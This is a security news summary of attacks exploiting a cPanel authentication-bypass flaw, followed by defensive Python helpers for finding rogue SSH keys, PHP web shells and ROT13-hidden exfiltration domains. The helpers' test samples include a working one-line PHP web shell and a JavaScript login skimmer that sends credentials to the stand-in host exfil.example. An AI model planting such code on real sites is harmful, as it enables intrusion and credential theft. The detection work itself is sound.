A threat actor tracked as Mr_Rot13 has been linked to attacks exploiting a critical cPanel vulnerability to install a backdoor called Filemanager on compromised systems, with more than 2,000 attacker source IPs seen in activity targeting the flaw, according to a technical analysis by QiAnXin XLab.
KEY FACTS
- Vulnerability: CVE-2026-41940 affects cPanel and WHM and can allow an authentication bypass.
- Observed activity: XLab said attacks have involved cryptocurrency mining, ransomware, botnet propagation, and backdoor deployment.
- Backdoor: Filemanager supports file management, remote command execution, and shell access.
- Scale: More than 2,000 attacker source IPs were seen worldwide.
The report said the exploitation began shortly after the flaw was publicly disclosed late last month. It described a shell script that uses wget or curl to fetch a Go-based infector, which then plants an SSH public key for persistent access and drops a PHP web shell.
The web shell is used to inject JavaScript that serves a fake login page and sends stolen credentials to an attacker-controlled domain, with the domain name stored ROT13-encoded in the injected code. The same chain also deploys a cross-platform backdoor that runs on Windows, macOS, and Linux systems.
The infector is also set up to collect bash history, SSH data, device information, database passwords, and cPanel virtual aliases from compromised hosts. XLab said the infrastructure suggests the group has operated for years, citing a domain first registered in 2020 and a backdoor uploaded in 2022.
WHY IT MATTERS
The activity shows how quickly newly disclosed control panel flaws can be turned into access for malware, credential theft, and broader intrusion. For affected administrators, the report points to the need for rapid patching, followed by checks for unauthorized SSH keys, PHP web shells, and tampering with the login page.
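The three checks above map directly onto the chain the report describes: a planted SSH public key, a dropped PHP web shell, and injected JavaScript that hides its exfiltration domain with ROT13. The following triage helpers are an added example written for this page; they are not XLab's code and not part of cPanel. They run on constructed sample data embedded in the block: the key material, the PHP snippet, the JavaScript and the domain exfil.example are placeholders, not indicators from the report. On a real host you would feed them /root/.ssh/authorized_keys, the PHP files under each account's public_html, and the login page templates, with the fingerprint allowlist maintained out of band.

```python
"""Triage helpers for the cPanel post-exploitation chain (added example, not XLab's code).
All inputs below are constructed samples; nothing here is an indicator from the report."""
import base64
import codecs
import hashlib
import re

# --- 1. Unauthorized SSH keys -------------------------------------------------
def ssh_key_fingerprint(line: str) -> str:
    """SHA256 fingerprint of one authorized_keys line, in the form ssh-keygen -l prints.
    Options such as no-pty,command="x" may precede the key; the key type is the first
    whitespace-separated field starting with ssh-/ecdsa-/sk-. (Option values that
    contain spaces are not handled by this simple split.)"""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok.startswith(("ssh-", "ecdsa-", "sk-")):
            digest = hashlib.sha256(base64.b64decode(parts[i + 1])).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no public key in line")

def unauthorized_keys(authorized_keys: str, allowed: set[str]) -> list[str]:
    """Lines of an authorized_keys file whose fingerprint is not on the admin allowlist.
    Compare fingerprints, not comments: the comment is free text and an intruder can
    copy a legitimate one."""
    bad = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if ssh_key_fingerprint(line) not in allowed:
            bad.append(line)
    return bad

# --- 2. PHP web shells ----------------------------------------------------------
SINKS = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
TAINT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b|base64_decode|gzinflate|str_rot13")

def webshell_indicators(php: str) -> list[str]:
    """Names of dangerous sinks whose argument text (up to the statement's ';') references
    request input or a decoding primitive. Not a parser: a cheap first pass to rank files
    for manual review, so it will miss shells that split the sink and the input apart."""
    hits = []
    for m in SINKS.finditer(php):
        end = php.find(";", m.end())
        arg_text = php[m.end(): end if end != -1 else len(php)]
        if TAINT.search(arg_text):
            hits.append(m.group(1))
    return hits

# --- 3. ROT13-obfuscated strings in injected JavaScript ----------------------
STRING_LITERAL = re.compile(r'"([^"\\\n]*)"|\'([^\'\\\n]*)\'')
HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$")

def rot13_hostnames(js: str) -> list[tuple[str, str]]:
    """Decode every string literal with ROT13 and keep the ones that turn into a hostname.
    ROT13 is its own inverse, so a single codec call recovers the plaintext. Any dotted
    literal decodes to another dotted literal, so results still need an analyst's eye."""
    found = []
    for m in STRING_LITERAL.finditer(js):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        dec = codecs.decode(raw, "rot13")
        if dec != raw and HOSTNAME.match(dec):
            found.append((raw, dec))
    return found

# --- constructed samples (placeholders, not real indicators) -------------------
def _fake_key(material: bytes, comment: str, key_type: str = "ssh-ed25519") -> str:
    # Any base64 blob fingerprints fine; real key structure is not needed for the demo.
    return f"{key_type} {base64.b64encode(material).decode()} {comment}"

KNOWN_KEY = _fake_key(b"constructed key material for the admin", "admin@ops")
ROGUE_KEY = "no-pty " + _fake_key(b"constructed key material for the intruder", "admin@ops")  # copied comment
SAMPLE_AUTHORIZED_KEYS = "# managed file\n" + KNOWN_KEY + "\n" + ROGUE_KEY + "\n"
ALLOWED = {ssh_key_fingerprint(KNOWN_KEY)}

WEBSHELL_PHP = '<?php if (isset($_REQUEST["c"])) { @eval(base64_decode($_REQUEST["c"])); } ?>'
BENIGN_PHP = '<?php $rows = $db->query("SELECT 1"); echo count($rows); ?>'

# Constructed credential-skimming snippet: an inline ROT13 routine r() hides the domain.
INJECTED_JS = ('(function(){var r=function(s){return s.replace(/[a-zA-Z]/g,function(c){'
               'return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});};'
               'var u="https://"+r("rksvy.rknzcyr")+"/c";'
               'document.querySelector("form").addEventListener("submit",function(e){'
               'navigator.sendBeacon(u,new URLSearchParams({u:document.getElementById("user").value,'
               'p:document.getElementById("pass").value}));});})();')

if __name__ == "__main__":
    print("unauthorized keys:", unauthorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED))
    print("web shell sinks:", {"shell.php": webshell_indicators(WEBSHELL_PHP),
                               "ok.php": webshell_indicators(BENIGN_PHP)})
    print("rot13 hostnames:", rot13_hostnames(INJECTED_JS))
```

Keying the SSH check on fingerprints rather than the comment field matters because the rogue sample deliberately reuses the admin's comment; the web-shell pass is a ranking heuristic, so treat an empty result as "nothing obvious", not as clean; and the ROT13 decoder turns the obfuscated literal straight into the exfiltration hostname you would then block and search for in access logs.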

